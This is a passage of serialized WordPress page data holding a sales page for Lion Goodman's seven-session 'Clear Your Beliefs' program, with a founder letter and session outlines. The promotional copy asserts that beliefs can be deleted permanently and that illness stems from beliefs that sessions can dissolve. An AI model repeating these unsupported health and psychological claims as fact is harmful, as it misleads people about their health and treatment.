System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:62370:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n<p><ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you 